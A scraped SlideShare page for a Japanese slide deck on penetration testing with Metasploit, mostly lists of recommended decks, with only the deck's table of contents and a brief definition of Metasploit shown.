Soumettre la recherche
Mettre en ligne
Metasploitでペネトレーションテスト
•
Télécharger en tant que PPTX, PDF
•
39 j'aime
•
23,658 vues
S
super_a1ice
Suivre
Internet
Signaler
Partager
Signaler
Partager
1 sur 49
Télécharger maintenant
Recommandé
mysql,innodb,foreign key
外部キー制約に伴うロックの小話
外部キー制約に伴うロックの小話
ichirin2501
2017/05/26のDB比較セミナーで使用した資料です。 NoSQLであるRedisについて説明しています。
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
イベント名:設立3周年記念チャリティーセミナー 講師:日本仮想化技術 宮原 日時:2010/2/6 アジェンダ: • KVMの概要 • KVM仮想マシン作成のコツ • KVMベンチマークテスト 概要: リリース直後に異例の速さでカーネルに取り込まれたKVMですが、VMwareやXenに比べて、まだまだ活用術や情報が少ないのが現状です。本セッションでは、KVMの仕組み、活用方法、性能評価の結果について解説いたします。
ゼロからはじめるKVM超入門
ゼロからはじめるKVM超入門
VirtualTech Japan Inc.
セキュリティエンジニアの夢!CVE、JVN番号の取得経験者になろう!(私の経験談)
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
kazkiti
オープンソースカンファレンス 2019 Tokyo/Spring 発表資料 #osc19tk https://www.ospn.jp/osc2019-spring/ 2019年2月22日(金)
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
GameServerDevelopers Vol.1 https://gsdevelopers.doorkeeper.jp/events/42497
ゲームエンジニアのためのデータベース設計
ゲームエンジニアのためのデータベース設計
sairoutine
Dockerやコンテナについての理解を目指す入門テキストです。 CloudNative Days Kansai 2019 - #CNDK2019 における発表資料です。 https://cloudnativedays.jp/cndk2019/
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
Container Runtime Meetup #3 発表資料 (2021/1/28) https://runtime.connpass.com/event/198071/
DockerとPodmanの比較
DockerとPodmanの比較
Akihiro Suda
Recommandé
mysql,innodb,foreign key
外部キー制約に伴うロックの小話
外部キー制約に伴うロックの小話
ichirin2501
2017/05/26のDB比較セミナーで使用した資料です。 NoSQLであるRedisについて説明しています。
Redisの特徴と活用方法について
Redisの特徴と活用方法について
Yuji Otani
イベント名:設立3周年記念チャリティーセミナー 講師:日本仮想化技術 宮原 日時:2010/2/6 アジェンダ: • KVMの概要 • KVM仮想マシン作成のコツ • KVMベンチマークテスト 概要: リリース直後に異例の速さでカーネルに取り込まれたKVMですが、VMwareやXenに比べて、まだまだ活用術や情報が少ないのが現状です。本セッションでは、KVMの仕組み、活用方法、性能評価の結果について解説いたします。
ゼロからはじめるKVM超入門
ゼロからはじめるKVM超入門
VirtualTech Japan Inc.
セキュリティエンジニアの夢!CVE、JVN番号の取得経験者になろう!(私の経験談)
CVE、JVN番号の取得経験者になろう!
CVE、JVN番号の取得経験者になろう!
kazkiti
オープンソースカンファレンス 2019 Tokyo/Spring 発表資料 #osc19tk https://www.ospn.jp/osc2019-spring/ 2019年2月22日(金)
Docker Compose 徹底解説
Docker Compose 徹底解説
Masahito Zembutsu
GameServerDevelopers Vol.1 https://gsdevelopers.doorkeeper.jp/events/42497
ゲームエンジニアのためのデータベース設計
ゲームエンジニアのためのデータベース設計
sairoutine
Dockerやコンテナについての理解を目指す入門テキストです。 CloudNative Days Kansai 2019 - #CNDK2019 における発表資料です。 https://cloudnativedays.jp/cndk2019/
コンテナの作り方「Dockerは裏方で何をしているのか?」
コンテナの作り方「Dockerは裏方で何をしているのか?」
Masahito Zembutsu
Container Runtime Meetup #3 発表資料 (2021/1/28) https://runtime.connpass.com/event/198071/
DockerとPodmanの比較
DockerとPodmanの比較
Akihiro Suda
勉強会で分散トレーシング技術について調査した内容を発表した資料です。OpenTracingやJaegerなどについてのざっくりとした解説などを行っています。
分散トレーシング技術について(Open tracingやjaeger)
分散トレーシング技術について(Open tracingやjaeger)
NTT Communications Technology Development
Report: https://dev.classmethod.jp/articles/game-server-development-seminar-by-cysharp/
Building the Game Server both API and Realtime via c#
Building the Game Server both API and Realtime via c#
Yoshifumi Kawai
talked by builderscon tokyo 2019 https://builderscon.io/tokyo/2019/session/18e6c5d7-9bb9-435f-b76d-86ba579b84df
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
whywaita
https://d-cube.connpass.com/
Ansibleで始めるインフラ構築自動化
Ansibleで始めるインフラ構築自動化
dcubeio
OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用 郷古 直仁 (GMOインターネット株式会社) アジェンダ: - Using OpenStack at GMO Internet --- OpenStack Diablo cluster: Onamae.com VPS --- OpenStack Grizzly cluster: ConoHa --- OpenStack Havana cluster: GMO AppsCloud --- OpenStack Juno cluster: ConoHa (2), GMO AppsCloud (2) ------ OpenStack Authentication in Juno (V2 keystone domains) - How to using OpenStack at GMO Internet --- OpenStack Designate DNSaaS: ConoHa, Z.com(OEM) --- OpenStack Cinder Block storage: ConoHa: NexentaStor(SDS), AppsCloud: NetApp --- OpenStack Ironic: Only AppsCloud: Undercloud Ironic deploy, Multi-tenant Ironic deploy --- OpenStack Swift: shared cluster
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
VirtualTech Japan Inc.
Elasticsearchが単一のストアにデータを効率的に組み合わせる仕組みと、Kibanaを使った分析の方法を解説します。さらに、運用の問題の早期特定・トラブルシューティング・解決に役立つ最新の機能をご紹介します。
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
Elasticsearch
こちらのスライドは以下のサイトにて閲覧いただけます。 https://www.docswell.com/s/ockeghem/ZM6VNK-phpconf2021-spa-security シングルページアプリケーション(SPA)において、セッションIDやトークンの格納場所はCookieあるいはlocalStorageのいずれが良いのかなど、セキュリティ上の課題がネット上で議論されていますが、残念ながら間違った前提に基づくものが多いようです。このトークでは、SPAのセキュリティを構成する基礎技術を説明した後、著名なフレームワークな状況とエンジニアの技術理解の現状を踏まえ、SPAセキュリティの現実的な方法について説明します。 動画はこちら https://www.youtube.com/watch?v=pc57hw6haXk
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
How to make native module with node-gyp.
node-gypを使ったネイティブモジュールの作成
node-gypを使ったネイティブモジュールの作成
shigeki_ohtsu
OSC2017Kyoto 講演資料です. (20170806: 講演で使ったバージョンに更新しました. 事前にアップロードしたものとほぼ同じです.)
DLL読み込みの問題を読み解く
DLL読み込みの問題を読み解く
JPCERT Coordination Center
CloudStack再入門!15分でおさらいするCloudStackの基礎 第19回CloudStackユーザー会in名古屋の発表資料です。
CloudStack再入門!15分でおさらいするCloudStackの基礎
CloudStack再入門!15分でおさらいするCloudStackの基礎
Satoshi Shimazaki
・データベース的な観点でのソーシャルゲームの特徴 ・データモデル ・ソーシャルゲームに従来型RDBMSを使うべきか、流行りのNoSQLで行くべきか ・負荷対策 (アーキテクチャ面) ・負荷対策 (ツール面) ・インフラエンジニアのキャリアについて
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
Yoshinori Matsunobu
6/30のOffice365勉強会のEntra Verified ID特集の資料です。 分散型ID、Entra Verified IDの解説をしています。
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
Naohiro Fujie
CyberAgent社内Adtech Developer Conference発表資料
KubernetesでRedisを使うときの選択肢
KubernetesでRedisを使うときの選択肢
Naoyuki Yamada
Kernel/Vm探検隊 online part2. 発表動画: https://youtu.be/brrm328XItM?t=8221
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Takaya Saeki
NTT Tech Conference 2022 での「Dockerからcontainerdへの移行」の発表資料です https://ntt-techconf.connpass.com/event/241061/ 訂正: P2. . 誤: ``` Ship docker run -it --rm alpine Run docker push ghcr.io/ktock/myalpine:latest ``` 正: ``` Ship docker push ghcr.io/ktock/myalpine:latest Run docker run -it --rm alpine ```
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Kohei Tokunaga
Grafana LokiではじめるKubernetesロギングハンズオン (NTT Tech Conference #4 ハンズオン資料) 2020年1月31日 株式会社NTTデータ / NTT DATA Masahiko Utsunomiya
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
丸の内MongoDB勉強会 #4で@fetarodcさんが発表した「MongoDB全設定値解説」のスライドです。https://github.com/syokenz/marunouchi-mongodb/tree/master/20121106/fetarodc
MongoDB Configパラメータ解説
MongoDB Configパラメータ解説
Shoken Fujisaki
Apache GEODE Meetup Tokyo #1 の資料です。
超高速処理とスケーラビリティを両立するApache GEODE
超高速処理とスケーラビリティを両立するApache GEODE
Masaki Yamakawa
NTT Tech Conference #2 にて話した資料 時間が足りなかったので全部は話せなかった。
分散システムについて語らせてくれ
分散システムについて語らせてくれ
Kumazaki Hiroki
日本Elasticユーザグループ
【JEUG】 オープンSIEMの世界へ
【JEUG】 オープンSIEMの世界へ
Hibino Hisashi
APPSEC APAC 2014 にて講演した資料の日本語版となります。 当日利用した資料は、こちらから参照いただけます。 https://speakerdeck.com/owaspjapan/management-for-security-life-cycle-number-appsecapac2014
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
CTFとは、世界的に有名な旗取り合戦(Capture The Flag)のことで、セキュリティ技術を競うコンテストの総称です。出題ジャンルは、暗号、バイナリ、ネットワーク、Web、プログラミングなど多岐に渡り、クイズ形式の問題の謎を解いたり、実験ネットワーク内で疑似的な攻防戦を行ったりするものです。セキュリティだけでなくプログラミングに関する知見も問われ、攻撃技術、防御技術、解析技術、暗号の知見、ネットワーク技術など、広範な知識と経験が必要となっています。CTFは総合的な問題解決力を磨く最適な競技と言えるでしょう。 CTFには既に20年近い歴史があり、ラスベガスのDEFCONでCTFが開催されたことをきっかけに、今やヨーロッパやアジア、オセアニアや南米など、各国で頻繁に競技会が開催されています。国際大会も多く、元祖DEFCONを筆頭に、マレーシアHack in the BOXや、韓国CODEGATEなど、世界中からチームがCTFに参戦して熱戦を繰り広げています。 日本では2000年代の前半に「運動会」、それに続く「セキュリティスタジアム」が開催されましたが、現在に至るまで数年の空白期間があり、普及啓発や人材育成という面で世界に後れを取っているのが現状です。先日JNSA賞を受賞した日本チームsutegoma2の孤軍奮闘のおかげで昨年ようやくDEFCON CTFの世界予選を2位で突破しましたが、残念ながら本選ではふるわず、まだまだ世界とは大きな格差があると言わざるを得ません。 そんな中、今年SECCON CTF実行委員会を発足し、日本全体のセキュリティ技術の底上げと人材発掘をはかる目的で、国内でも本格的にCTF競技会を開催することとしました。
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
Contenu connexe
Tendances
勉強会で分散トレーシング技術について調査した内容を発表した資料です。OpenTracingやJaegerなどについてのざっくりとした解説などを行っています。
分散トレーシング技術について(Open tracingやjaeger)
分散トレーシング技術について(Open tracingやjaeger)
NTT Communications Technology Development
Report: https://dev.classmethod.jp/articles/game-server-development-seminar-by-cysharp/
Building the Game Server both API and Realtime via c#
Building the Game Server both API and Realtime via c#
Yoshifumi Kawai
talked by builderscon tokyo 2019 https://builderscon.io/tokyo/2019/session/18e6c5d7-9bb9-435f-b76d-86ba579b84df
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
whywaita
https://d-cube.connpass.com/
Ansibleで始めるインフラ構築自動化
Ansibleで始めるインフラ構築自動化
dcubeio
OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用 郷古 直仁 (GMOインターネット株式会社) アジェンダ: - Using OpenStack at GMO Internet --- OpenStack Diablo cluster: Onamae.com VPS --- OpenStack Grizzly cluster: ConoHa --- OpenStack Havana cluster: GMO AppsCloud --- OpenStack Juno cluster: ConoHa (2), GMO AppsCloud (2) ------ OpenStack Authentication in Juno (V2 keystone domains) - How to using OpenStack at GMO Internet --- OpenStack Designate DNSaaS: ConoHa, Z.com(OEM) --- OpenStack Cinder Block storage: ConoHa: NexentaStor(SDS), AppsCloud: NetApp --- OpenStack Ironic: Only AppsCloud: Undercloud Ironic deploy, Multi-tenant Ironic deploy --- OpenStack Swift: shared cluster
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
VirtualTech Japan Inc.
Elasticsearchが単一のストアにデータを効率的に組み合わせる仕組みと、Kibanaを使った分析の方法を解説します。さらに、運用の問題の早期特定・トラブルシューティング・解決に役立つ最新の機能をご紹介します。
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
Elasticsearch
こちらのスライドは以下のサイトにて閲覧いただけます。 https://www.docswell.com/s/ockeghem/ZM6VNK-phpconf2021-spa-security シングルページアプリケーション(SPA)において、セッションIDやトークンの格納場所はCookieあるいはlocalStorageのいずれが良いのかなど、セキュリティ上の課題がネット上で議論されていますが、残念ながら間違った前提に基づくものが多いようです。このトークでは、SPAのセキュリティを構成する基礎技術を説明した後、著名なフレームワークな状況とエンジニアの技術理解の現状を踏まえ、SPAセキュリティの現実的な方法について説明します。 動画はこちら https://www.youtube.com/watch?v=pc57hw6haXk
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
How to make native module with node-gyp.
node-gypを使ったネイティブモジュールの作成
node-gypを使ったネイティブモジュールの作成
shigeki_ohtsu
OSC2017Kyoto 講演資料です. (20170806: 講演で使ったバージョンに更新しました. 事前にアップロードしたものとほぼ同じです.)
DLL読み込みの問題を読み解く
DLL読み込みの問題を読み解く
JPCERT Coordination Center
CloudStack再入門!15分でおさらいするCloudStackの基礎 第19回CloudStackユーザー会in名古屋の発表資料です。
CloudStack再入門!15分でおさらいするCloudStackの基礎
CloudStack再入門!15分でおさらいするCloudStackの基礎
Satoshi Shimazaki
・データベース的な観点でのソーシャルゲームの特徴 ・データモデル ・ソーシャルゲームに従来型RDBMSを使うべきか、流行りのNoSQLで行くべきか ・負荷対策 (アーキテクチャ面) ・負荷対策 (ツール面) ・インフラエンジニアのキャリアについて
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
Yoshinori Matsunobu
6/30のOffice365勉強会のEntra Verified ID特集の資料です。 分散型ID、Entra Verified IDの解説をしています。
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
Naohiro Fujie
CyberAgent社内Adtech Developer Conference発表資料
KubernetesでRedisを使うときの選択肢
KubernetesでRedisを使うときの選択肢
Naoyuki Yamada
Kernel/Vm探検隊 online part2. 発表動画: https://youtu.be/brrm328XItM?t=8221
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Takaya Saeki
NTT Tech Conference 2022 での「Dockerからcontainerdへの移行」の発表資料です https://ntt-techconf.connpass.com/event/241061/ 訂正: P2. . 誤: ``` Ship docker run -it --rm alpine Run docker push ghcr.io/ktock/myalpine:latest ``` 正: ``` Ship docker push ghcr.io/ktock/myalpine:latest Run docker run -it --rm alpine ```
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Kohei Tokunaga
Grafana LokiではじめるKubernetesロギングハンズオン (NTT Tech Conference #4 ハンズオン資料) 2020年1月31日 株式会社NTTデータ / NTT DATA Masahiko Utsunomiya
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
NTT DATA Technology & Innovation
丸の内MongoDB勉強会 #4で@fetarodcさんが発表した「MongoDB全設定値解説」のスライドです。https://github.com/syokenz/marunouchi-mongodb/tree/master/20121106/fetarodc
MongoDB Configパラメータ解説
MongoDB Configパラメータ解説
Shoken Fujisaki
Apache GEODE Meetup Tokyo #1 の資料です。
超高速処理とスケーラビリティを両立するApache GEODE
超高速処理とスケーラビリティを両立するApache GEODE
Masaki Yamakawa
NTT Tech Conference #2 にて話した資料 時間が足りなかったので全部は話せなかった。
分散システムについて語らせてくれ
分散システムについて語らせてくれ
Kumazaki Hiroki
日本Elasticユーザグループ
【JEUG】 オープンSIEMの世界へ
【JEUG】 オープンSIEMの世界へ
Hibino Hisashi
Tendances
(20)
分散トレーシング技術について(Open tracingやjaeger)
分散トレーシング技術について(Open tracingやjaeger)
Building the Game Server both API and Realtime via c#
Building the Game Server both API and Realtime via c#
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
なぜディスクレスハイパーバイザに至ったのか / Why did we select to the diskless hypervisor? #builde...
Ansibleで始めるインフラ構築自動化
Ansibleで始めるインフラ構築自動化
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
GMOインターネット様 発表「OpenStackのモデルの最適化とConoHa, Z.comとGMOアプリクラウドへの適用」 - OpenStack最新情...
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
ログ+メトリック+トレースの組み合わせで構築する一元的なオブザーバビリティ
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
node-gypを使ったネイティブモジュールの作成
node-gypを使ったネイティブモジュールの作成
DLL読み込みの問題を読み解く
DLL読み込みの問題を読み解く
CloudStack再入門!15分でおさらいするCloudStackの基礎
CloudStack再入門!15分でおさらいするCloudStackの基礎
ソーシャルゲームのためのデータベース設計
ソーシャルゲームのためのデータベース設計
今なら間に合う分散型IDとEntra Verified ID
今なら間に合う分散型IDとEntra Verified ID
KubernetesでRedisを使うときの選択肢
KubernetesでRedisを使うときの選択肢
WebAssemblyのWeb以外のことぜんぶ話す
WebAssemblyのWeb以外のことぜんぶ話す
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
Grafana LokiではじめるKubernetesロギングハンズオン(NTT Tech Conference #4 ハンズオン資料)
MongoDB Configパラメータ解説
MongoDB Configパラメータ解説
超高速処理とスケーラビリティを両立するApache GEODE
超高速処理とスケーラビリティを両立するApache GEODE
分散システムについて語らせてくれ
分散システムについて語らせてくれ
【JEUG】 オープンSIEMの世界へ
【JEUG】 オープンSIEMの世界へ
En vedette
APPSEC APAC 2014 にて講演した資料の日本語版となります。 当日利用した資料は、こちらから参照いただけます。 https://speakerdeck.com/owaspjapan/management-for-security-life-cycle-number-appsecapac2014
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
Akitsugu Ito
CTFとは、世界的に有名な旗取り合戦(Capture The Flag)のことで、セキュリティ技術を競うコンテストの総称です。出題ジャンルは、暗号、バイナリ、ネットワーク、Web、プログラミングなど多岐に渡り、クイズ形式の問題の謎を解いたり、実験ネットワーク内で疑似的な攻防戦を行ったりするものです。セキュリティだけでなくプログラミングに関する知見も問われ、攻撃技術、防御技術、解析技術、暗号の知見、ネットワーク技術など、広範な知識と経験が必要となっています。CTFは総合的な問題解決力を磨く最適な競技と言えるでしょう。 CTFには既に20年近い歴史があり、ラスベガスのDEFCONでCTFが開催されたことをきっかけに、今やヨーロッパやアジア、オセアニアや南米など、各国で頻繁に競技会が開催されています。国際大会も多く、元祖DEFCONを筆頭に、マレーシアHack in the BOXや、韓国CODEGATEなど、世界中からチームがCTFに参戦して熱戦を繰り広げています。 日本では2000年代の前半に「運動会」、それに続く「セキュリティスタジアム」が開催されましたが、現在に至るまで数年の空白期間があり、普及啓発や人材育成という面で世界に後れを取っているのが現状です。先日JNSA賞を受賞した日本チームsutegoma2の孤軍奮闘のおかげで昨年ようやくDEFCON CTFの世界予選を2位で突破しましたが、残念ながら本選ではふるわず、まだまだ世界とは大きな格差があると言わざるを得ません。 そんな中、今年SECCON CTF実行委員会を発足し、日本全体のセキュリティ技術の底上げと人材発掘をはかる目的で、国内でも本格的にCTF競技会を開催することとしました。
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
takesako
第77回情報処理学会全国大会でのデジタル・フォレンジック特別セッションで用いた資料
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
UEHARA, Tetsutaro
PHPカンファレンス北海道にて 2012/04/21
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
Hiroshi Tokumaru
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
Sen Ueno
2015/9/30ささみ発表資料
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
Masakazu Ikeda
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
sonickun
2015年2月20日のssmjpで発表したスライドです.
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
sonickun
2017/02/21 の #ssmjp で発表した際のスライドです。
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
sonickun
Kali Linuxで初等的な脆弱性スキャンと攻撃を実践
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
monochrojazz
Badstoreを用いた実践の回答編
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
Burp Suite Japan User Group
8/25の障害を理解するためには、そもそもインターネットの経路広報ってのが何なのか、というのを説明しなきゃいけなくなる。 ということで、それを説明するための資料を書いてみた。
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
Ken SASAKI
オープンソースカンファレンス2016 Hokkaido で使用した資料です。 https://www.ospn.jp/osc2016-do/modules/eguide/event.php?eid=40
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
Ierae Security
LINEゲームのセキュリティ診断手法 愛甲健二(LINE株式会社 セキュリティ室) CEDEC2017の講演資料です http://cedec.cesa.or.jp/2017/session/ENG/s5911733aab37a/
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
LINE Corporation
2015/07/31の #ssmjp で発表した資料です.
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
sonickun
12/20に#ssmjpにて登壇した際の資料です。 LT中では説明しきれなかった部分を若干つけたししています。 なお、PoCのデモ動画は以下にアップロードしています。 https://youtu.be/OWqBYuExKqo
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
zaki4649
AV TOKYO 2017(http://ja.avtokyo.org/)の講演資料を公開します。
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
Tomohisa Ishikawa, CISSP, CSSLP, CISA, CISM, CFE
CpawCTF勉強会で発表したNetwork講習の資料です。 #CpawCTF
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
Takaaki Hoyo
SSL/TLSの基礎と最新動向 セキュリティキャンプ2015
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
shigeki_ohtsu
コンピュータエンジニアへのFPGAのすすめ ssm.jp 2017/8/25
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Takeshi HASEGAWA
En vedette
(20)
Management for Security Life Cycle (日本語版)
Management for Security Life Cycle (日本語版)
SECCON CTF セキュリティ競技会コンテスト開催について
SECCON CTF セキュリティ競技会コンテスト開催について
Ipsj77フォレンジック研究動向
Ipsj77フォレンジック研究動向
徳丸本に載っていないWebアプリケーションセキュリティ
徳丸本に載っていないWebアプリケーションセキュリティ
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
自分でできるWebアプリケーション脆弱性診断 - デブサミ2010
脆弱性検査ツールってどうよ
脆弱性検査ツールってどうよ
ARPスプーフィングによる中間者攻撃
ARPスプーフィングによる中間者攻撃
ダークネットのはなし #ssmjp
ダークネットのはなし #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
RSA暗号運用でやってはいけない n のこと #ssmjp
Kali LinuxとMetasploitable2で遊ぼう
Kali LinuxとMetasploitable2で遊ぼう
[BurpSuiteJapan]Burp Suite回答編
[BurpSuiteJapan]Burp Suite回答編
初心者向けインターネットの仕組みと8/25の障害についての説明
初心者向けインターネットの仕組みと8/25の障害についての説明
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
osc2016do ひげで学ぶWebアプリケーションに潜むリスク
[CEDEC2017] LINEゲームのセキュリティ診断手法
[CEDEC2017] LINEゲームのセキュリティ診断手法
進化するWebトラッキングの話 #ssmjp
進化するWebトラッキングの話 #ssmjp
ノリとその場の勢いでPocを作った話
ノリとその場の勢いでPocを作った話
[AVTOKYO 2017] What is red team?
[AVTOKYO 2017] What is red team?
CpawCTF 勉強会 Network
CpawCTF 勉強会 Network
SSL/TLSの基礎と最新動向
SSL/TLSの基礎と最新動向
コンピュータエンジニアへのFPGAのすすめ
コンピュータエンジニアへのFPGAのすすめ
Similaire à Metasploitでペネトレーションテスト
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Masatoshi Itoh
JJUG CCC 2012 Fall でのスライドです。
Spock's world
Spock's world
Takuma Watabiki
1MB
1MB
arase_utagoe
BBBBB
BBBBB
arase_utagoe
NetOpsCodingで話した内容です https://atnd.org/events/70253
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
kinunori
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
urasandesu
2011/8/1のSpringユーザ会の勉強会で発表したものです
vFabricを触ろう
vFabricを触ろう
土岐 孝平
はこだてIKA ITWG 第4回勉強会 単体テストのすすめで使用した資料です。 発表後に資料を追加してたりします。
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
hakoika-itwg
はこだてIKA 第4回勉強会
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Seiji KOMATSU
Version管理 1
Version管理 1
hakoika-itwg
2011/9/17 nwstudy で行ったセッションのスライドです。
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
彰 村地
20130329 rtm2
20130329 rtm2
openrtm
2016/6/27 NetOpsCoding#3 LT
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
OSSラボ株式会社
CruiseControl.NET設置
CruiseControl.NET設置
CruiseControl.NET設置
Kuniaki Igarashi
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Masataka MIZUNO
Kobe sec#7 summary
Kobe sec#7 summary
Yukio NAGAO
JJUG CCC 2014 Spring における講演資料 http://www.java-users.jp/?page_id=1048#R2-6
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JPCERT Coordination Center
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
Etsuji Nakai
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Tetsuya Chiba
第7回Ruby東海勉強会の発表資料
Capistranoで自動デプロイ
Capistranoで自動デプロイ
toyoshi
Similaire à Metasploitでペネトレーションテスト
(20)
システムテスト自動化標準ガイド 5章発表資料
システムテスト自動化標準ガイド 5章発表資料
Spock's world
Spock's world
1MB
1MB
BBBBB
BBBBB
テスト駆動で行うネットワーク自動化のすすめ
テスト駆動で行うネットワーク自動化のすすめ
Eclipse を使った java 開発 111126 杉浦
Eclipse を使った java 開発 111126 杉浦
vFabricを触ろう
vFabricを触ろう
第4回勉強会 単体テストのすすめ
第4回勉強会 単体テストのすすめ
はこだてIKA 第4回勉強会 単体テスト
はこだてIKA 第4回勉強会 単体テスト
Version管理 1
Version管理 1
実際に流れているデータを見てみよう
実際に流れているデータを見てみよう
20130329 rtm2
20130329 rtm2
オープンソースNW監視ツールのご紹介
オープンソースNW監視ツールのご紹介
CruiseControl.NET設置
CruiseControl.NET設置
クラウド開発に役立つ OSS あれこれ
クラウド開発に役立つ OSS あれこれ
Kobe sec#7 summary
Kobe sec#7 summary
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
JRE標準ライブラリの脆弱性事例を理解する (AtomicReferenceArrayクラス と Type Confusion)
Aeolus Conductorによる複数環境へのデプロイ自動化
Aeolus Conductorによる複数環境へのデプロイ自動化
20121217 jawsug-yokohama
20121217 jawsug-yokohama
Capistranoで自動デプロイ
Capistranoで自動デプロイ
Metasploitでペネトレーションテスト
1.
Metasploitでペネトレーションテスト @super_a1ice
2.
目次 Metasploit Framework基本 Webアプリケーションの脆弱性を突いてみる Metasploit プラグイン Exploitを作って電卓を起動してみる
3.
Metasploit Frameworkとは? 脆弱性を発見し、それを実証するためのフレームワー ク ペネトレーションテストを効率化するためのツール システムに重大な被害を与える可能性があるため、使 用には注意が必要
4.
Metasploit Framework基本
5.
Msfconsoleコマンド
6.
